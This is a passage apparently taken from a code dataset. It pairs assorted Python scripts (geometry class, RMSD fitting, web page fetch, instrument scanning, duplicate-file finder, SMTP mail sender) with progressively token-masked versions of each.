"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n<class token>\n"
] | false |
99,872 | fd1d3408e3eb723beebdd5939d9d955ad592bdca | #!/usr/bin/env python3
import sys
import numpy as np
from rmsdlib import multifit
def fit_multi_npy(a, ref):
#print(np.shape(a))
#print(np.shape(ref))
rotation, translation, RMSD = multifit(a, ref)
rot = np.transpose(rotation, axes=(0,2,1))
COM = a.sum(axis=1)/a.shape[1]
centered = a - COM[:,None,:]
rotated = np.einsum('...ij,...jk->...ik',centered,rot)
fitted = rotated + COM[:,None,:]
translated = fitted - translation[:,None,:]
return RMSD
at1 = [ int(l.split()[0])-1 for l in open(sys.argv[3]).readlines()]
at2 = [ int(l.split()[0])-1 for l in open(sys.argv[4]).readlines()]
lib1 = np.load(sys.argv[1])[:,at1]
lib2 = np.load(sys.argv[2])[:,at2]
outfile=sys.argv[5]
comp_matrix = np.zeros((len(lib1), len(lib2)))
n = 0
for conf1 in lib1:
rmsd = fit_multi_npy(lib2, conf1)
comp_matrix[n] = rmsd
n+=1
np.save(outfile, comp_matrix)
| [
"#!/usr/bin/env python3\n\nimport sys\nimport numpy as np\nfrom rmsdlib import multifit\n\ndef fit_multi_npy(a, ref):\n #print(np.shape(a))\n #print(np.shape(ref))\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0,2,1))\n COM = a.sum(axis=1)/a.shape[1]\n centered = a - COM[:,None,:]\n rotated = np.einsum('...ij,...jk->...ik',centered,rot)\n fitted = rotated + COM[:,None,:]\n translated = fitted - translation[:,None,:]\n return RMSD\n\nat1 = [ int(l.split()[0])-1 for l in open(sys.argv[3]).readlines()]\nat2 = [ int(l.split()[0])-1 for l in open(sys.argv[4]).readlines()]\n\nlib1 = np.load(sys.argv[1])[:,at1]\nlib2 = np.load(sys.argv[2])[:,at2]\n\noutfile=sys.argv[5]\n\ncomp_matrix = np.zeros((len(lib1), len(lib2)))\n\nn = 0\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n+=1\n\nnp.save(outfile, comp_matrix)\n",
"import sys\nimport numpy as np\nfrom rmsdlib import multifit\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\nat1 = [(int(l.split()[0]) - 1) for l in open(sys.argv[3]).readlines()]\nat2 = [(int(l.split()[0]) - 1) for l in open(sys.argv[4]).readlines()]\nlib1 = np.load(sys.argv[1])[:, at1]\nlib2 = np.load(sys.argv[2])[:, at2]\noutfile = sys.argv[5]\ncomp_matrix = np.zeros((len(lib1), len(lib2)))\nn = 0\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n += 1\nnp.save(outfile, comp_matrix)\n",
"<import token>\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\nat1 = [(int(l.split()[0]) - 1) for l in open(sys.argv[3]).readlines()]\nat2 = [(int(l.split()[0]) - 1) for l in open(sys.argv[4]).readlines()]\nlib1 = np.load(sys.argv[1])[:, at1]\nlib2 = np.load(sys.argv[2])[:, at2]\noutfile = sys.argv[5]\ncomp_matrix = np.zeros((len(lib1), len(lib2)))\nn = 0\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n += 1\nnp.save(outfile, comp_matrix)\n",
"<import token>\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\n<assignment token>\nfor conf1 in lib1:\n rmsd = fit_multi_npy(lib2, conf1)\n comp_matrix[n] = rmsd\n n += 1\nnp.save(outfile, comp_matrix)\n",
"<import token>\n\n\ndef fit_multi_npy(a, ref):\n rotation, translation, RMSD = multifit(a, ref)\n rot = np.transpose(rotation, axes=(0, 2, 1))\n COM = a.sum(axis=1) / a.shape[1]\n centered = a - COM[:, None, :]\n rotated = np.einsum('...ij,...jk->...ik', centered, rot)\n fitted = rotated + COM[:, None, :]\n translated = fitted - translation[:, None, :]\n return RMSD\n\n\n<assignment token>\n<code token>\n",
"<import token>\n<function token>\n<assignment token>\n<code token>\n"
] | false |
99,873 | 699a94ccd6ddb2f3f87975ca73bc9a518eb3e294 | from selenium import webdriver
import time
url="https://car.autohome.com.cn/config/spec/1000001.html"
driver=webdriver.PhantomJS()
driver.get(url)
print(driver.page_source) | [
"from selenium import webdriver\nimport time\n\nurl=\"https://car.autohome.com.cn/config/spec/1000001.html\"\ndriver=webdriver.PhantomJS()\n\ndriver.get(url)\n\nprint(driver.page_source)",
"from selenium import webdriver\nimport time\nurl = 'https://car.autohome.com.cn/config/spec/1000001.html'\ndriver = webdriver.PhantomJS()\ndriver.get(url)\nprint(driver.page_source)\n",
"<import token>\nurl = 'https://car.autohome.com.cn/config/spec/1000001.html'\ndriver = webdriver.PhantomJS()\ndriver.get(url)\nprint(driver.page_source)\n",
"<import token>\n<assignment token>\ndriver.get(url)\nprint(driver.page_source)\n",
"<import token>\n<assignment token>\n<code token>\n"
] | false |
99,874 | 9f14bddb75d1020d23cd000f4e0daf31639ef658 | # Script control setup area
# script info
__script__.title = 'Scan vsamphi'
__script__.version = '0.1'
G1 = Group('Scan on vsamphi')
device_name = 'vsamphi'
arm_length = Par('float', 0)
scan_start = Par('float', 0)
scan_stop = Par('float', 0)
number_of_points = Par('int', 0)
scan_mode = Par('string', 'time', options = ['time', 'count'])
scan_mode.enabled = True
scan_preset = Par('int', 0)
act1 = Act('scan_device()', 'Scan on Device')
def scan_device():
aname = str(device_name)
# axis_name.value = aname
np = int(number_of_points.value)
if np <= 0:
return
if np == 1:
step_size = 0
else:
step_size = float(scan_stop.value - scan_start.value) / (np - 1)
slog('runscan ' + str(device_name) + ' ' + str(scan_start.value) + ' ' + str(scan_stop.value) \
+ ' ' + str(number_of_points.value) + ' ' + str(scan_mode.value) + ' ' + str(scan_preset.value))
if str(scan_mode.value) == 'time' :
mode = quokka.hmMode.time
elif str(scan_mode.value) == 'count':
mode = quokka.hmMode.monitor
else:
mode = quokka.hmMode.time
sics.run_command('newfile HISTOGRAM_XY')
org_z = sicsext.getStableValue('samz').getFloatData()
time.sleep(1)
for p in xrange(np):
samphi = scan_start.value + step_size * p
slog('drive ' + aname + ' ' + str(samphi))
sics.drive('samphi', scan_start.value + step_size * p)
samz = calc_samz(samphi, arm_length.value, org_z)
slog('drive samz ' + str(samz))
sics.drive('samz', samz)
quokka.driveHistmem(mode, scan_preset.value)
sics.run_command('save ' + str(p))
slog('finished NP ' + str(p))
time.sleep(1)
G1.add(arm_length, scan_start, scan_stop, number_of_points, scan_mode, scan_preset, act1)
def calc_samz(samphi, length, org_z):
return org_z - length * math.sin(samphi * math.pi / 180)
# Use below example to create a new Plot
# Plot4 = Plot(title = 'new plot')
# This function is called when pushing the Run button in the control UI.
def __run_script__(fns):
global Plot1
global Plot2
global Plot3
# check if a list of file names has been given
if (fns is None or len(fns) == 0) :
print 'no input datasets'
else :
for fn in fns:
# load dataset with each file name
ds = Plot3.ds
if ds != None and len(ds) > 0:
if ds[0].location == fn:
return
df.datasets.clear()
ds = df[fn]
axis_name = 'samphi'
dname = 'total_counts'
data = ds[dname]
axis = ds[axis_name]
if not hasattr(axis, '__len__'):
axis = SimpleData([axis], title = axis_name)
ds2 = Dataset(data, axes=[axis])
ds2.title = ds.id
ds2.location = fn
Plot1.set_dataset(ds2)
Plot1.x_label = axis_name.value
Plot1.y_label = dname
Plot1.title = dname + ' vs ' + axis_name.value
Plot1.pv.getPlot().setMarkerEnabled(True)
def __dispose__():
global Plot1
global Plot2
global Plot3
Plot1.clear()
Plot2.clear()
Plot3.clear()
| [
"# Script control setup area\r\n# script info\r\n__script__.title = 'Scan vsamphi'\r\n__script__.version = '0.1'\r\n\r\nG1 = Group('Scan on vsamphi')\r\ndevice_name = 'vsamphi'\r\narm_length = Par('float', 0)\r\nscan_start = Par('float', 0)\r\nscan_stop = Par('float', 0)\r\nnumber_of_points = Par('int', 0)\r\nscan_mode = Par('string', 'time', options = ['time', 'count'])\r\nscan_mode.enabled = True\r\nscan_preset = Par('int', 0)\r\nact1 = Act('scan_device()', 'Scan on Device')\r\ndef scan_device():\r\n aname = str(device_name)\r\n# axis_name.value = aname\r\n np = int(number_of_points.value)\r\n if np <= 0:\r\n return\r\n if np == 1:\r\n step_size = 0\r\n else:\r\n step_size = float(scan_stop.value - scan_start.value) / (np - 1)\r\n slog('runscan ' + str(device_name) + ' ' + str(scan_start.value) + ' ' + str(scan_stop.value) \\\r\n + ' ' + str(number_of_points.value) + ' ' + str(scan_mode.value) + ' ' + str(scan_preset.value))\r\n if str(scan_mode.value) == 'time' :\r\n mode = quokka.hmMode.time\r\n elif str(scan_mode.value) == 'count':\r\n mode = quokka.hmMode.monitor\r\n else:\r\n mode = quokka.hmMode.time\r\n sics.run_command('newfile HISTOGRAM_XY')\r\n org_z = sicsext.getStableValue('samz').getFloatData()\r\n time.sleep(1)\r\n for p in xrange(np):\r\n samphi = scan_start.value + step_size * p\r\n slog('drive ' + aname + ' ' + str(samphi))\r\n sics.drive('samphi', scan_start.value + step_size * p)\r\n samz = calc_samz(samphi, arm_length.value, org_z)\r\n slog('drive samz ' + str(samz))\r\n sics.drive('samz', samz)\r\n quokka.driveHistmem(mode, scan_preset.value)\r\n sics.run_command('save ' + str(p))\r\n slog('finished NP ' + str(p))\r\n time.sleep(1)\r\n \r\nG1.add(arm_length, scan_start, scan_stop, number_of_points, scan_mode, scan_preset, act1)\r\n\r\n\r\ndef calc_samz(samphi, length, org_z):\r\n return org_z - length * math.sin(samphi * math.pi / 180)\r\n \r\n# Use below example to create a new Plot\r\n# Plot4 = Plot(title = 'new plot')\r\n\r\n# This function is called when pushing the Run button in the control UI.\r\ndef __run_script__(fns):\r\n global Plot1\r\n global Plot2\r\n global Plot3\r\n \r\n # check if a list of file names has been given\r\n if (fns is None or len(fns) == 0) :\r\n print 'no input datasets'\r\n else :\r\n for fn in fns:\r\n # load dataset with each file name\r\n ds = Plot3.ds\r\n if ds != None and len(ds) > 0:\r\n if ds[0].location == fn:\r\n return\r\n df.datasets.clear()\r\n ds = df[fn]\r\n axis_name = 'samphi'\r\n dname = 'total_counts'\r\n data = ds[dname]\r\n axis = ds[axis_name]\r\n if not hasattr(axis, '__len__'):\r\n axis = SimpleData([axis], title = axis_name)\r\n ds2 = Dataset(data, axes=[axis])\r\n ds2.title = ds.id\r\n ds2.location = fn\r\n Plot1.set_dataset(ds2)\r\n Plot1.x_label = axis_name.value\r\n Plot1.y_label = dname\r\n Plot1.title = dname + ' vs ' + axis_name.value\r\n Plot1.pv.getPlot().setMarkerEnabled(True)\r\n\r\n \r\ndef __dispose__():\r\n global Plot1\r\n global Plot2\r\n global Plot3\r\n Plot1.clear()\r\n Plot2.clear()\r\n Plot3.clear()\r\n"
] | true |
99,875 | 35899b6b0f382467c1fdbacf425ed65eced1d5b4 | #!/usr/bin/env python3
# Generated by AtCoder Tools 2.8.0
# Copyright 2021 Yuichiro Smith
import sys
MOD = 998244353 # type: int
def solve(N: int, Q: int, A: "List[int]", x: "List[int]", y: "List[int]"):
return
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
Q = int(next(tokens)) # type: int
A = [int(next(tokens)) for _ in range(N)] # type: "List[int]"
x = [int()] * (Q) # type: "List[int]"
y = [int()] * (Q) # type: "List[int]"
for i in range(Q):
x[i] = int(next(tokens))
y[i] = int(next(tokens))
solve(N, Q, A, x, y)
if __name__ == '__main__':
main()
| [
"#!/usr/bin/env python3\n# Generated by AtCoder Tools 2.8.0\n# Copyright 2021 Yuichiro Smith\nimport sys\n\nMOD = 998244353 # type: int\n\n\ndef solve(N: int, Q: int, A: \"List[int]\", x: \"List[int]\", y: \"List[int]\"):\n return\n\n\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n Q = int(next(tokens)) # type: int\n A = [int(next(tokens)) for _ in range(N)] # type: \"List[int]\"\n x = [int()] * (Q) # type: \"List[int]\"\n y = [int()] * (Q) # type: \"List[int]\"\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
"import sys\nMOD = 998244353\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\nMOD = 998244353\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n<assignment token>\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n<assignment token>\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,876 | ca607e46abd1b8b33e9da48876b4c1dc1fe81329 | from datetime import datetime
from crontab import Crontab
| [
"from datetime import datetime\nfrom crontab import Crontab\n\n",
"from datetime import datetime\nfrom crontab import Crontab\n",
"<import token>\n"
] | false |
99,877 | 79f18506a24a06170a26ff49adcd65f90f05ca26 | import sys
import os
import argparse
from collections import defaultdict
def search_doubles(dirpath):
compare_files = defaultdict(list)
for dirpath, dirnames, filenames in os.walk(dirpath):
for fname in filenames:
fsize = os.path.getsize(os.path.join(dirpath, fname))
compare_files[(fname, fsize)].append(dirpath)
return filter(lambda x: len(x[1]) > 1, compare_files.items())
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--path',
help='start directory for searching duplicates',
required=True)
return parser.parse_args()
if __name__ == '__main__':
args = get_args()
for found_file in search_doubles(args.path):
for path in found_file[1]:
print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))
| [
"import sys\nimport os\nimport argparse\nfrom collections import defaultdict\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[(fname, fsize)].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path',\n help='start directory for searching duplicates',\n required=True)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n for found_file in search_doubles(args.path):\n for path in found_file[1]:\n print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))\n",
"import sys\nimport os\nimport argparse\nfrom collections import defaultdict\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path', help=\n 'start directory for searching duplicates', required=True)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n for found_file in search_doubles(args.path):\n for path in found_file[1]:\n print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))\n",
"<import token>\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path', help=\n 'start directory for searching duplicates', required=True)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n for found_file in search_doubles(args.path):\n for path in found_file[1]:\n print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))\n",
"<import token>\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path', help=\n 'start directory for searching duplicates', required=True)\n return parser.parse_args()\n\n\n<code token>\n",
"<import token>\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,878 | a744dedd178ba60d143e0bce2cff17ac3633c740 | #!/usr/bin/python
#
#
# Usage: send-mail.py [OPTIONS]
# -h print this message and quit
# -s <server>[:port] - port is 25 unless specified
# -f <from address>
# -t <to address>
# -S <Subject>
# -b <body>
# -A <attachment>
import os
import smtplib
import sys
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from getopt import getopt
def main():
"""main function"""
# gather arguments
opts, args = getopt(sys.argv[1:], "hs:f:t:S:b:A:", ["help"])
attachment = None
# argument parsing
for o, a in opts:
if o in ("-h", "--help"):
print_help()
sys.exit(0)
elif o == "-s":
mail_server_string = a
elif o == "-f":
from_address = a
elif o == "-t":
to_address = a
elif o == "-S":
subject = a
elif o == "-b":
body = a
elif o == "-A":
attachment = a
else:
assert False, "unhandled option"
if len(opts) < 5:
print("too few options")
print_help()
sys.exit(1)
# parse mail server information
if ":" in mail_server_string:
mail_server, mail_port = mail_server_string.split(":")
else:
mail_server = mail_server_string
mail_port = 25
send_email(mail_server, mail_port, from_address, to_address, subject, body, attachment)
sys.exit(0)
def send_email(mail_server, mail_port, from_addr, to_addr, subject, body, attachment):
"""sends email"""
print("Sending mail from %s to %s with subject %s and attachment %s" % (from_addr,
to_addr, subject, attachment))
mail_server = mail_server
mail_port = mail_port
# create the message use MIMEMultipart, MIMEText to deal with unicode
msg = MIMEMultipart()
msg['Subject'] = subject
msg['From'] = from_addr
msg['To'] = to_addr
body = MIMEText(body, 'plain')
msg.attach(body)
#print(msg.as_string())
# add attachment, if provided
if attachment:
try:
with open(attachment, 'rb') as fp:
attach = MIMEBase('application', "octet-stream")
attach.set_payload(fp.read())
encoders.encode_base64(attach)
attach.add_header('Content-Disposition', 'attachment', filename=os.path.basename(attachment))
msg.attach(attach)
except:
print("Unable to attach file, error: ", sys.exc_info())
# send mail message
smtp = smtplib.SMTP(mail_server, mail_port)
try:
smtp.sendmail(from_addr, to_addr, msg.as_string())
except:
print("Unexpected error:" + str(sys.exc_info()[0]))
smtp.quit()
def print_help():
'''prints a help message'''
print("""Usage: send-mail.py [OPTIONS]
-h print this message and quit
-s <server>[:port] - port is 25 unless specified
-f <from address>
-t <to address>
-S <Subject>
-b <body>
-A <attachment>""")
if __name__ == '__main__':
main()
| [
"#!/usr/bin/python\n#\n#\n# Usage: send-mail.py [OPTIONS]\n# -h print this message and quit\n# -s <server>[:port] - port is 25 unless specified\n# -f <from address>\n# -t <to address>\n# -S <Subject>\n# -b <body>\n# -A <attachment>\n\nimport os\nimport smtplib\nimport sys\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom getopt import getopt\n\n\ndef main():\n \"\"\"main function\"\"\"\n\n # gather arguments\n opts, args = getopt(sys.argv[1:], \"hs:f:t:S:b:A:\", [\"help\"])\n attachment = None\n\n # argument parsing\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print_help()\n sys.exit(0)\n elif o == \"-s\":\n mail_server_string = a\n elif o == \"-f\":\n from_address = a\n elif o == \"-t\":\n to_address = a\n elif o == \"-S\":\n subject = a\n elif o == \"-b\":\n body = a\n elif o == \"-A\":\n attachment = a\n else:\n assert False, \"unhandled option\"\n\n if len(opts) < 5:\n print(\"too few options\")\n print_help()\n sys.exit(1)\n\n # parse mail server information\n if \":\" in mail_server_string:\n mail_server, mail_port = mail_server_string.split(\":\")\n else:\n mail_server = mail_server_string\n mail_port = 25\n\n send_email(mail_server, mail_port, from_address, to_address, subject, body, attachment)\n\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body, attachment):\n \"\"\"sends email\"\"\"\n print(\"Sending mail from %s to %s with subject %s and attachment %s\" % (from_addr, \n to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n\n # create the message use MIMEMultipart, MIMEText to deal with unicode\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n #print(msg.as_string())\n\n # add attachment, if provided\n if attachment:\n try:\n with open(attachment, 'rb') as fp:\n attach = MIMEBase('application', \"octet-stream\")\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename=os.path.basename(attachment))\n msg.attach(attach)\n except:\n print(\"Unable to attach file, error: \", sys.exc_info())\n\n # send mail message\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print(\"Unexpected error:\" + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n '''prints a help message'''\n print(\"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\")\n\n\nif __name__ == '__main__':\n main()\n\n",
"import os\nimport smtplib\nimport sys\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom getopt import getopt\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body,\n attachment):\n \"\"\"sends email\"\"\"\n print('Sending mail from %s to %s with subject %s and attachment %s' %\n (from_addr, to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n if attachment:\n try:\n with open(attachment, 'rb') as fp:\n attach = MIMEBase('application', 'octet-stream')\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename\n =os.path.basename(attachment))\n msg.attach(attach)\n except:\n print('Unable to attach file, error: ', sys.exc_info())\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print('Unexpected error:' + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body,\n attachment):\n \"\"\"sends email\"\"\"\n print('Sending mail from %s to %s with subject %s and attachment %s' %\n (from_addr, to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n if attachment:\n try:\n with open(attachment, 